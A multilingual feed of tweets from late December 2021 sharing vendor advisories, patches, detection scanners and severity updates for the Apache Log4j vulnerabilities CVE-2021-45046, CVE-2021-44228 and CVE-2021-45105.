2021-12-29 00:21:16Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046, CVE-2021-45105 and CVE-2021-44832. | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-28 23:05:35An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/rrJJOP3W5n https://twitter.com/i/web/status/1475962847289090049ProductCERT
2021-12-28 14:00:07@0xDUDE If it affects the same number of real-world products as CVE-2021-45046 or CVE-2021-45105, your weekend should be just fine.wdormann
2021-12-28 13:40:06log4jについてUnity自体は今のところ大丈夫だそうです。 December 2021 Security Update (CVE-2021-44228, CVE-2021-45046, log4j Java library) https://t.co/oKbXchpkn0 https://unity.com/ja/security/unity-sec-21720ToyaShiwasu
2021-12-28 09:00:09🔴APACHE🔴 Múltiples vulnerabilidades de severidad alta en productos APACHE: CVE-2021-45046,CVE-2021-45105 Más inf… https://t.co/4nviNBsgRN https://twitter.com/i/web/status/1475752154161889281GrupoICA_Ciber
2021-12-28 09:00:06🔴DEBIAN🔴 Múltiples vulnerabilidades de severidad alta en productos DEBIAN: CVE-2021-45046,CVE-2021-45078,CVE-2021… https://t.co/TBgtiIdx2k https://twitter.com/i/web/status/1475753188032761860GrupoICA_Ciber
2021-12-28 04:50:12色々と落ち着いたので、Tableauのlog4jのまとめ。 CVE-2021-44228 及び CVE-2021-45046は2021/12/15へアップデート https://t.co/33Q0C55zle CVE-2021-4… https://t.co/KCOqMac0Qp https://kb.tableau.com/articles/Issue/Apache-Log4j2-vulnerability-Log4shell?lang=ja https://twitter.com/i/web/status/1475690213813141504nohoyan
2021-12-28 02:40:12[ブログ更新] Apache Log4j脆弱性(CVE-2021-45046, CVE-2021-45105)のIBM Db2への影響について https://t.co/L8jsi5jC8L https://j.mp/3z4YAKJsimosako
2021-12-28 01:12:15CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/8ajeEHS97G https://twitter.com/i/web/status/1475632852834263042JTelly
2021-12-28 00:41:18凄く久しぶりですが、Unofficial DB2 Blogに1つポストしました。Apache Log4j脆弱性(CVE-2021-45046, CVE-2021-45105)のIBM Db2への影響についてのSecurity Bu… https://t.co/gntkAKJbJH https://twitter.com/i/web/status/1475625883402924032simosako
2021-12-28 00:01:36【セキュリティ情報】 「Apache Log4j における任意のコードが実行可能な脆弱性について(CVE-2021-44228, CVE-2021-45046) 」を掲載しました。 https://t.co/nwCdaXAmwg https://www.apresia.jp/technical/security/APRESIA_Systems
2021-12-27 22:50:34An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/A0qGsySyFq https://twitter.com/i/web/status/1475599078331502596ProductCERT
2021-12-27 17:10:09Arctic Wolf's #Log4Shell Deep Scan Tool can enable detection of both CVE-2021-45046 and CVE-2021-44228 within nest… https://t.co/Xed5i5hWNm https://twitter.com/i/web/status/1475514012683149314AWNetworks
2021-12-27 14:20:36ポイントです👉 追加: 「以下 Apache Log4j 任意のコード実行に関する脆弱性に関しても、製品に対する影響はありません。」 CVE-2021-4104 CVE-2021-45046 CVE-2021-45105 CV… https://t.co/S8nQ0ZSgEk https://twitter.com/i/web/status/1475470669874106372twinklestar1111
2021-12-27 12:20:25Security Bulletin: Apache Log4j vulnerabilities, CVE-2021-45105 (affecting v2.16) and CVE-2021-45046 (affecting v2.… https://t.co/HoHyaqTLHM https://twitter.com/i/web/status/1475441339164766211cybsecbot
2021-12-27 10:10:18Nueva vulnerabilidad en #Log4j suma mayor incertidumbre (CVE-2021-45046) 9 Critical https://t.co/J4hh3LWgNh https://t.co/iAS0u8YzK8 https://nvd.nist.gov/vuln/detail/CVE-2021-45046ESFERARED
2021-12-27 03:20:17🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/hyqovsa8RW https://twitter.com/i/web/status/1475305322080350218threatintelctr
2021-12-26 06:30:53Mohist-1.7.10のlog4j脆弱性(CVE-2021-44228, CVE-2021-45046, CVE-2021-45105)対策版出ました https://t.co/8LWOMLcm19 https://ci.codemc.io/job/MohistMC/job/Mohist-1.7.10/45/Kaiz_JP
2021-12-26 04:50:05Apache Log4j2のセキュリティ脆弱性(CVE-2021-44228およびCVE-2021-45046)に関する情報が2021年12月中旬に報道されましたが、当該脆弱性はClaris 製品に影響はない旨がClaris ナレ… https://t.co/uy5NNieHOj https://twitter.com/i/web/status/1474963969664512001matsuo_atsushi
2021-12-25 19:51:16vCenter Server で CVE-2021-44228 & CVE-2021-45046 への対処が未実施の方、今なら vc_log4j_mitigator.py の実行だけで済みますので早めの対処を・・・ https://t.co/1zt8R4esGP https://jangari-ntk.github.io/post/2021-12-26/Jangari_nTK
2021-12-25 19:10:17log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/s3ATpYnooc https://twitter.com/i/web/status/1474818133651337226ethical_enso
2021-12-25 17:53:17Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide https://t.co/MPtZQZzbVg https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/SbrCh2
2021-12-25 17:43:57.@FortiGuardLabs provides important updates about Apache #Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, an… https://t.co/d3w87eDspn https://twitter.com/i/web/status/1474796076335079427A_Valencia_Gil
2021-12-25 07:11:06CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-25 00:51:32“Zoom Security Bulletin for CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105” https://t.co/GgicIjCgoD https://htn.to/2eEhbjaYQFmodokey
2021-12-24 14:32:17CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/VZBfoFPuex https://twitter.com/i/web/status/14743823617520025661Ivango1
2021-12-24 13:43:56CISA Log4j 취약점(CVE-2021-44228, CVE-2021-45046) 점검 스캐너(Scanner) 다운로드 : https://t.co/4673XU7cuD http://naver.me/F5LCnsVevirusmyths
2021-12-24 06:00:28Oracle Database and Apache log4j vulnerability CVE-2021-44228 and CVE-2021-45046 #tfa #ahf Trace File Analyzer (TF… https://t.co/rEAczgSLNY https://twitter.com/i/web/status/1474256925126631429AmbreKamlesh
2021-12-24 05:51:16.@FortiGuardLabs provides important updates about Apache #Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, an… https://t.co/V1VO80eLWJ https://twitter.com/i/web/status/1474254918689173509mdfaridulalam
2021-12-23 23:11:59【VMware Japan Blog】VMware のWAF でApache Log4j の脆弱性対策してみた 2021年12月、Apache Log4j に深刻な脆弱性(CVE-2021-44228/CVE-2021-45046… https://t.co/KcZX3xIhhy https://twitter.com/i/web/status/1474152895503294471VMware_Japan
2021-12-23 22:20:11An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/GZODDFIQRO https://twitter.com/i/web/status/1474141840714739713ProductCERT
2021-12-23 21:00:14Details from @carter_kozak RE in #log4j 2.17.0, why they're important, how they relate to CVE-2021-45046 and CVE-20… https://t.co/MAFpZwTZ5T https://twitter.com/i/web/status/1474121541969494018GaryGregory
2021-12-23 17:11:16.@FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/UTX7uKO5I6 https://twitter.com/i/web/status/1474062581761556485FortiMisti1
2021-12-23 17:10:53Do you need to check if your java software has a problem with #log4j vulnerability CVE-2021-45046? Here you have… https://t.co/whD4zjvYgO https://twitter.com/i/web/status/1474063103314825218ajimenezsa
2021-12-23 15:18:30CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-23 14:12:55Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.3M (audience size) CVE-2021-45046: 842.3K CVE-2021-4… https://t.co/gfXGjG1qhC https://twitter.com/i/web/status/1474016954730041352CVEtrends
2021-12-23 13:30:52ICYMI: Apache Solr is not vulnerable against CVE-2021-45046 and CVE-2021-45105: See https://t.co/ik9PoyjzD5 https://solr.apache.org/security.htmlhosted_solr
2021-12-23 13:30:49Apache Solr releases are not vulnerable to the followup CVE-2021-45046 and CVE-2021-45105, because the MDC patterns… https://t.co/WeYOLCJptZ https://twitter.com/i/web/status/1474006093667999745hosted_solr
2021-12-23 11:10:05Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/iORYxx9jzD #vulnerability #log4j https://ecs.page.link/vVb69FreedomNetTech
2021-12-23 09:01:35🔴APACHE🔴 Múltiples vulnerabilidades de severidad alta en productos APACHE: CVE-2021-45046,CVE-2021-44224,CVE-2021… https://t.co/rtXw2ktD08 https://twitter.com/i/web/status/1473940219187515395GrupoICA_Ciber
2021-12-23 09:01:09🔴DEBIAN🔴 Múltiples vulnerabilidades de severidad alta en productos DEBIAN: CVE-2021-45046,CVE-2021-4010,CVE-2021-… https://t.co/PUIvAHeIqp https://twitter.com/i/web/status/1473940871204720643GrupoICA_Ciber
2021-12-23 07:40:26Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/EugO1H5iOe https://dy.si/ZBQJiStefanicAndrej
2021-12-23 05:11:41IBM DB2 の Apache Log4j の処理に任意のコードを実行されるなど複数の問題 (CVE-2021-45046, CVE-2021-45 [40879] https://t.co/Hlzw5pz4K2 #SIDfm #脆弱性情報 https://sid.softek.jp/content/show/40879softek_jp
2021-12-23 01:31:19.@FortiGuardLabs Threat Signal Report: New Log4j Vulnerability (CVE-2021-45046) Results in Denial of Service… https://t.co/Mdb5KBHhaK https://twitter.com/i/web/status/1473826555663208453SDCarter10
2021-12-22 23:01:12Un avis a été mis à jour : "SSA-661247: Apache #Log4j Vulnerabilities (#Log4Shell CVE-2021-44228, CVE-2021-45046) -… https://t.co/xcX4iXlqcj https://twitter.com/i/web/status/1473788782432464901HaboubiAnis
2021-12-22 22:40:53An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/31szzOSJdi https://twitter.com/i/web/status/1473784586165530624ProductCERT
2021-12-22 22:23:40log4j-detector: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your file-system within any a… https://t.co/7cmQzgWfO1 https://twitter.com/i/web/status/1473778076886904835ptracesecurity
2021-12-22 22:20:10#HCL #Knowledgebase CVE-2021-44228 + CVE-2021-45046 + CVE-2021-45105, Log4J 2 / Log4Shell Security Advisory for Not… https://t.co/C3vyJ8QUT7 https://twitter.com/i/web/status/1473780311414738955domino_robot
2021-12-22 20:41:49Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-22 18:17:09#FortiGuardLabs provides important updates about Apache #Log4j vulnerabilities (CVE-2021-44228, CVE-2021-45046, and… https://t.co/sDDHYxbXlq https://twitter.com/i/web/status/1473715210598948869FortiGuardLabs
2021-12-22 17:57:45#FortiGuardLabs provides important updates about Apache #Log4j vulnerabilities (CVE-2021-4422, CVE-2021-45046, and… https://t.co/qekVdRbmlG https://twitter.com/i/web/status/1473711184796913676FortiGuardLabs
2021-12-22 17:10:34UPDATES to our #Log4j #Log4Shell Resource page: Added new vulnerabilities from NVD #CVE-2021-4104, #CVE-2021-45046,… https://t.co/YZS76AMw11 https://twitter.com/i/web/status/1473701447296507907aDolus_Inc
2021-12-22 16:40:28"According to public reporting, Log4Shell and CVE-2021-45046 are being actively exploited." https://t.co/vpzOfAIKx5 https://us-cert.cisa.gov/ncas/current-activity/2021/12/22/mitigating-log4shell-and-other-log4j-related-vulnerabilitiesmarckranat
2021-12-22 16:21:50Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/UIXYfcO4ZJ via… https://t.co/F2WqIVKopr https://buff.ly/3oTpaDe https://twitter.com/i/web/status/1473688544023650312darkwebjournal
2021-12-22 16:11:11GHSL-2021-1054_GHSL-2021-1055: Unsafe Deserialization in log4j2 - CVE-2021-45046 https://t.co/WH7O3M8JIl https://github.co/3egOpsVGHSecurityLab
2021-12-22 16:10:13Log4j RCE vulnerability explained with bypass for the initial fix (CVE-2021-44228, CVE-2021-45046)… https://t.co/Uob7GojPpA https://twitter.com/i/web/status/1473687258771476481FreakBizarro
2021-12-22 16:00:16CISAがCVE-2021-44228やCVE-2021-45046といったLog4jの脆弱性(Log4Shell)のスキャナーをリリースし、主な機能は以下とのことです。 - URLリストのサポート - HTTPリクエストヘッダー… https://t.co/Fxwtnb3sPe https://twitter.com/i/web/status/1473683957099417606MasaKAMAYAMA
2021-12-22 15:23:57Log4j RCE vulnerability explained with bypass for the initial fix (CVE-2021-44228, CVE-2021-45046) https://t.co/tKAivySeff https://ift.tt/3yP2I1tFreakBizarro
2021-12-22 15:11:36Arctic Wolf, stellt das Detection Script „#Log4Shell Deep Scan“ zur Erkennung von CVE-2021-45046 und CVE-2021-44228… https://t.co/Cjd7C2gh8F https://twitter.com/i/web/status/1473669671392100357it__security
2021-12-22 14:51:31"While CVE-2021-45046 is less severe than the original vulnerability, it becomes another vector for threat actors t… https://t.co/S7a1ZMG7hp https://twitter.com/i/web/status/1473664801402404874McDutchoven
2021-12-22 14:11:02Log4j: The Evolution of Vulnerabilities to CVE-2021-45046 and What to Expect in 2022 https://t.co/DVxwkXF7Pk #log4j #log4shell https://www.alertlogic.com/blog/log4j-the-evolution-of-vulnerabilities-to%e2%80%afcve-2021-45046-and-what-to-expect-in-2022/vaexdanny
2021-12-22 13:20:17@Usmanatif6 According to the advisory they released patches. See: CVE-2021-44228/CVE-2021-45046 Advisory for Oracl… https://t.co/iOqsZDeWuC https://twitter.com/i/web/status/1473643657265827840oraclebase
2021-12-22 11:50:26log4j-detector v2021.12.22 releases: detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046) on your fil… https://t.co/GwqBLHdTJ6 https://twitter.com/i/web/status/1473619386300780544the_yellow_fall
2021-12-22 08:10:58mergebase/log4j-detector: Scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) https://t.co/IZ8Pc9v7Et https://github.com/mergebase/log4j-detectorLuna_0x01
2021-12-22 08:03:42K32171392: Apache #Log4j2 vulnerability CVE-2021-45046 https://t.co/vi7VSuVsS9 http://www.ccn-cert.cni.es/component/vulnerabilidades/view/32961.htmljr_net
2021-12-22 07:17:39درحالی‌که کارشناسان هشدار می‌دادند که عوامل تهدید فعالانه تلاش می‌کنند تا از آسیب‌پذیری دوم، بانام CVE-2021-45046 ک… https://t.co/uwRtq8IPZZ https://twitter.com/i/web/status/1473549623356796931Citnanewsagency
2021-12-22 06:50:22窓の杜記事も出てましたね。 https://t.co/DQvFNl8oHC "しかし、その後も「CVE-2021-45105」「CVE-2021-45046」といった問題が相次いで報告されたことから、「Arduino IDE」か… https://t.co/0gBHfxwav6 https://forest.watch.impress.co.jp/docs/news/1376179.html https://twitter.com/i/web/status/1473545889646247939yamadamn
2021-12-22 05:50:39#Log4Shell Fix for older Java 6, 7, 8 versions CVE-2021-45046 CVE-2021-44882 #log4j 2.3.1 2.12.3 2.17 cve-2021-4… https://t.co/ovxJ6FziJz https://twitter.com/i/web/status/1473529365778640900fpientka
2021-12-22 01:20:36🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/ve5j1VuS8F https://twitter.com/i/web/status/1473463183595773956threatintelctr
2021-12-22 01:08:55Security Bulletin: Vulnerability in Apache Log4j affects IBM Cloud Private (CVE-2021-45046) https://t.co/2DeYzVpyyn https://ift.tt/3moZ8pKmicsieg
2021-12-21 23:50:48Log4j: The Evolution of Vulnerabilities to CVE-2021-45046 and What t #infosec #infosecurity #cybersecurity… https://t.co/UcQ8jf0s9t https://twitter.com/i/web/status/1473439818604552195CyberIQs_
2021-12-21 23:14:48CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-21 22:50:44An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/mt31Pg4Wpc https://twitter.com/i/web/status/1473424175138226181ProductCERT
2021-12-21 20:30:22Security Bulletin: Multiple vulnerabilities in Apache Log4j affects some features of IBM® #Db2® (CVE-2021-45046, CV… https://t.co/wOyKYAHbwK https://twitter.com/i/web/status/1473389478773506062fpientka
2021-12-21 18:40:26Log4j reactions from the new guy: CVE-2021-4104, no big. CVE-2021-44228, Fuuuuuuuuuuuuu. CVE-2021-45046, Damnit. CVE-2021-45105, Come on.samuelali
2021-12-21 18:21:19.@printixnet and CVE-2021-44228 and CVE-2021-45046 https://t.co/4kNZNnb3rW https://printix.net/blog/printix-cve-2021-44228-cve-2021-45046geoffwilbur
2021-12-21 16:51:29#Log4j CVE-2021-45046 has been upgraded from a “LOW” CVSS Score of 3.7 to a “CRITICAL” 9.0. Read our Customer Aler… https://t.co/GoksOq7lJD https://twitter.com/i/web/status/1473334369364422660waratek
2021-12-21 16:22:43Log4Shell ( CVE-2021-44228 and CVE-2021-45046) - Leaves affected versions of Log4j packages vulnerable to Remote Co… https://t.co/C9LEsahEAP https://twitter.com/i/web/status/1473326766198382597hlosukwakha
2021-12-21 15:21:01承前 "Log4Shellの脆弱性に関する更新情報 Log4Shell脆弱性のCVE-2021-44228に関連する2つの追加CVE、CVE-2021-4104とCVE-2021-45046が公開、最新情報が提供されました。 L… https://t.co/96gqvZd2Ty https://twitter.com/i/web/status/1473310677309997058kabukawa
2021-12-21 15:20:58承前 "判断されました。CVE-2021-45046 に記載されているとおりです。 > この為、Logging構成でContext Lookup(例: > $${ctx:loginId})又はThread Context Ma… https://t.co/UlFBOEsRPp https://twitter.com/i/web/status/1473310678476009475kabukawa
2021-12-21 15:10:45New: updated log4j detection in eComscan 1.4.23. Checks for CVE-2021-45105, CVE-2021-45046 (log4j version below 2… https://t.co/aCgXPyFWey https://twitter.com/i/web/status/1473305322387382272sansecio
2021-12-21 14:55:24VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/qJyQ461iFe https://dy.si/9beWBalexganser
2021-12-21 14:23:23Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/PLSFudJSb1 https://dy.si/FrbbQumacboyvictor
2021-12-21 14:00:20Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.6M (audience size) CVE-2021-45046: 858.2K CVE-2021-3… https://t.co/CxgwuepWFE https://twitter.com/i/web/status/1473292178147401731CVEtrends
2021-12-21 13:47:04VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/fApY5Buv7N https://dy.si/M3qtDSeanWilliams68
2021-12-21 13:42:13CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/Q8AMV3Hhd7 https://twitter.com/i/web/status/14732866415024087081Ivango1
2021-12-21 13:41:12CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/QEegvb5RAb https://twitter.com/i/web/status/1473286892686745609Lori_Riot
2021-12-21 13:01:37JavaのLog4jライブラリで「Log4Shell」に加えて新たな脆弱性「CVE-2021-45046」が発覚、アップデートで対応可能 - https://t.co/AeYTGP9txQ https://t.co/K4grHng0Ih https://saberlion.com/itnews/?tag=20211221215439itnewspickup
2021-12-21 12:21:27A 2nd Log4j #vulnerability, CVE-2021-45046 was identified last week, creating additional opportunities for risk and… https://t.co/7ju7Michvt https://twitter.com/i/web/status/1473264699361923076kivuconsulting
2021-12-21 12:10:12Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/ytYRzDes7b https://dy.si/FnHW46virtualquebec
2021-12-21 11:40:33Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize... https://t.co/Eeolz0DvmY https://dy.si/B6GGzJMarcHuppert
2021-12-21 10:30:12@WD4096 あと②CVE-2021-45046の一部の環境で任意コード実行可能はログ出力のパターンが(例:$${ctx:loginId})みたいな感じ(デフォルトから変更)になっている場合に発生し、変更されていない場合は①の脆… https://t.co/w5qkuQGE5K https://twitter.com/i/web/status/1473237522981732354mopper27af
2021-12-21 10:20:17@WD4096 ①CVE-2021-44228(任意のコード実行) ⇒ 2.15で対応したが不十分だったため、2.16で対応(Lookup機能削除) ②CVE-2021-45046(DoS攻撃、一部の環境では任意のコード実行可能… https://t.co/Zb41yX82kA https://twitter.com/i/web/status/1473236043298373632mopper27af
2021-12-21 09:50:15Aparece el CVE-2021-44228, nos cagamos en todo y toca parchear. Justo al acabar, aparece el CVE-2021-45046, nos vol… https://t.co/pIjfPYEhha https://twitter.com/i/web/status/1473228097709346821BetaAthe
2021-12-21 09:50:08Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/G5bB6jls4M https://dy.si/mqv4HStuartGilks123
2021-12-21 09:10:58🔴INTEL🔴 Múltiples vulnerabilidades de severidad alta en productos INTEL: CVE-2021-45046,CVE-2021-44228 Más info… https://t.co/E2ugdwpHsS https://twitter.com/i/web/status/1473216840986140672GrupoICA_Ciber
2021-12-21 09:10:43Workaround instructions to address CVE-2021-44228 and CVE-2021-45046 in vRealize Operations 8.x https://t.co/v1Ny57gaW8 https://dy.si/5FhMREalexganser
2021-12-21 09:00:21🔴APACHE🔴 Múltiples vulnerabilidades de severidad alta en productos APACHE: CVE-2021-45046,CVE-2021-45105,CVE-2021… https://t.co/FCqlCNEwk1 https://twitter.com/i/web/status/1473215481905614854GrupoICA_Ciber
2021-12-21 09:00:10🔴SONICWALL🔴 Múltiples vulnerabilidades de severidad alta en productos SONICWALL: CVE-2021-45046,CVE-2021-44228 M… https://t.co/2TJP259YcH https://twitter.com/i/web/status/1473216126322712580GrupoICA_Ciber
2021-12-21 09:00:08🔴DEBIAN🔴 Múltiples vulnerabilidades de severidad alta en productos DEBIAN: CVE-2021-45046,CVE-2021-45078,CVE-2021… https://t.co/TGg52Sps2M https://twitter.com/i/web/status/1473216169645645827GrupoICA_Ciber
2021-12-21 08:40:06VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/5xYVaABgKW https://dy.si/7nZoRTinaKrogull
2021-12-21 08:40:04#Stormshield Visibility Center (SVC) <= 1.6.0 affecté par les vulnérabilités #log4j (CVE-2021-44228, CVE-2021-45046… https://t.co/9s8CVdgf5k https://twitter.com/i/web/status/1473211574169088001idroxide
2021-12-21 07:20:24第八話 ジェイのかたち ネットのかたち CVE-2021-44228(CVSS10.0) CVE-2021-45046(CVSS9.0) CVE-2021-45105(CVSS7.5) CVE-2021-4104(CVSS8.1… https://t.co/zpHoYHqJd2 https://twitter.com/i/web/status/1473189869174521862r_o_r_o_r_o_r_o
2021-12-21 05:44:56This addresses CVE-2021-44228 and CVE-2021-45046. See the official H2O update. Starting with this release, the Pyth… https://t.co/b9qx5BslIB https://twitter.com/i/web/status/1473164281348870145gcpweekly
2021-12-21 05:44:41This addresses CVE-2021-44228 and CVE-2021-45046. See the official H2O update. As previously announced in the M87 r… https://t.co/B2AKX4uANm https://twitter.com/i/web/status/1473164306317512708gcpweekly
2021-12-21 04:50:20Apache Log3Shell | CVE-2021-44228 & CVE-2021-45046 https://t.co/nXb4N0SBkJ https://r3dbird.blogspot.com/2021/12/apache-log3shell-cve-2021-44228-cve.htmldrok3r
2021-12-21 04:40:59Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released https://t.co/YyVePPhWyJ https://t.co/HKIAzPr7b0 http://dlvr.it/SFm6rWAndresCyberSec
2021-12-21 02:13:51Citrix Security Advisory for CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-21 02:11:20log4j 脆弱性関連 荒れてません?・・・ CVE-2021-44228 CVE-2021-45105 CVE-2021-45046 まだありそう・・・Msuta555
2021-12-21 01:51:09@daniel_bilar Hello, here is your unroll: Log4j hype check: the new CVE-2021-45046: - only applies in certain…… https://t.co/3fLh47FDfQ https://twitter.com/i/web/status/1473107805796192261threadreaderapp
2021-12-20 22:40:26An advisory has been updated: "SSA-661247: Apache Log4j Vulnerabilities (Log4Shell, CVE-2021-44228, CVE-2021-45046)… https://t.co/c0DADTOF9m https://twitter.com/i/web/status/1473058141826867210ProductCERT
2021-12-20 22:00:07VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/o3dWPY5SjB https://dy.si/RdR9Mswedersen
2021-12-20 19:00:24⚠️UPDATED Log4j PSIRT Inclusive of CVE-2021-44228 & CVE-2021-45046 Still Investigating CVE-2021-45105… https://t.co/HXLdlNLaoj https://twitter.com/i/web/status/1473004425371336711Cisco_East_SE
2021-12-20 19:00:14CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/rgnJcFjLLK https://twitter.com/i/web/status/1473004532112130051Lori_Riot
2021-12-20 18:51:45Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/6ykpqueKot https://dy.si/RbeELCMarcHuppert
2021-12-20 18:31:19CVE-2021-45046 https://t.co/Iai3sOUFdK #HarsiaInfo https://har-sia.info/CVE-2021-45046.htmlHar_sia
2021-12-20 18:20:20Hello Everyone! The Spatial team has investigated the Log4Shell vulnerability (CVE-2021-44228) and (CVE-2021-45046)… https://t.co/vHyaqKio7s https://twitter.com/i/web/status/1472995196124209153spatialcorp
2021-12-20 17:46:37Additional step for vCenter Server CVE-2021-44228 and CVE-2021-45046 workaround. https://t.co/SXovNfBgdB https://dy.si/svJqJazaelcolon
2021-12-20 17:21:27🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/NB5COyCLrN https://twitter.com/i/web/status/1472979999447732231threatintelctr
2021-12-20 17:12:13VMware Site Recovery Manager is getting patch resolve CVE-2021-44228 and CVE-2021-45046. https://t.co/XASOgss2bp https://dy.si/bxP4gscandaletti
2021-12-20 16:53:36Tous nos projets sont de nouveau à jour suite à la CVE-2021-45046 !MonsieurBiz
2021-12-20 16:50:35🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/pzoDWF4Bxj https://twitter.com/i/web/status/1472972450241540097threatintelctr
2021-12-20 16:27:13@securityaffairs Which patch level is vulnerable to this technique? Only up to CVE-2021-45046, i.e <2.16.0?daubsi
2021-12-20 16:25:37Log4Shell: Rilasciato PoC pubblico per lo sfruttamento della CVE-2021-45046 (AL03/211217/CSIRT-ITA) https://t.co/C5HHcIfMwR https://ift.tt/33E0q9USinetNews
2021-12-20 15:44:42Log4J acte 2 - CVE-2021-45046 ✅MaximeHourane
2021-12-20 15:00:07Interesting Reading: Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/q2Y61CKTlD https://bit.ly/3EZClrIGFritchey
2021-12-20 14:37:47Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) https://t.co/bqGIZzuWrM https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/senthenes
2021-12-20 14:34:58Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 1.8M (audience size) CVE-2021-45046: 823.8K CVE-2021-4… https://t.co/WMF9CvD9G6 https://twitter.com/i/web/status/1472929792949428225CVEtrends
2021-12-20 13:42:47The tale of two very different CVSS scores for CVE-2021-45046. NVD still has C and I Impact at None and A Impact at… https://t.co/OUXMgLcVXo https://twitter.com/i/web/status/1472923160219721733WeldPond
2021-12-20 13:40:56CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Perguntas frequentes sobre Log4Shell e vulnerabilidades associadas https://t.co/QsH1Hiu74K http://ow.ly/a0MG103ghGpdansantanna
2021-12-20 13:32:31CVE-2021-44228, CVE-2021-45046, CVE-2021-4104: Frequently Asked Questions About Log4Shell and Associated Vulnerabil… https://t.co/ohYkaIdOM0 https://twitter.com/i/web/status/1472920858557517825lizbeth_plaza
2021-12-20 13:30:47@iriyak_playlive I'm sorry to be late. I would like to know the impact of CVE-2021-44228, CVE-2021-45046, CVE-2021-… https://t.co/gsTVBYoTvG https://twitter.com/i/web/status/1472922012297601026nino_1991_jp
2021-12-20 13:01:09Second Log4j Vulnerability (CVE-2021-45046) Discovered — New Patch Released #log4j https://t.co/l7IS834ocY https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.htmlGDBALA
2021-12-20 11:50:40🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/cuIZBhgWzA https://twitter.com/i/web/status/1472896953449123841threatintelctr
2021-12-20 11:13:14Découverte de la deuxième vulnérabilité de Log4j (CVE-2021-45046) - Publication d'un nouveau correctif https://t.co/zBteZiNgDL https://bit.ly/3yrIJ8Sdjzerty
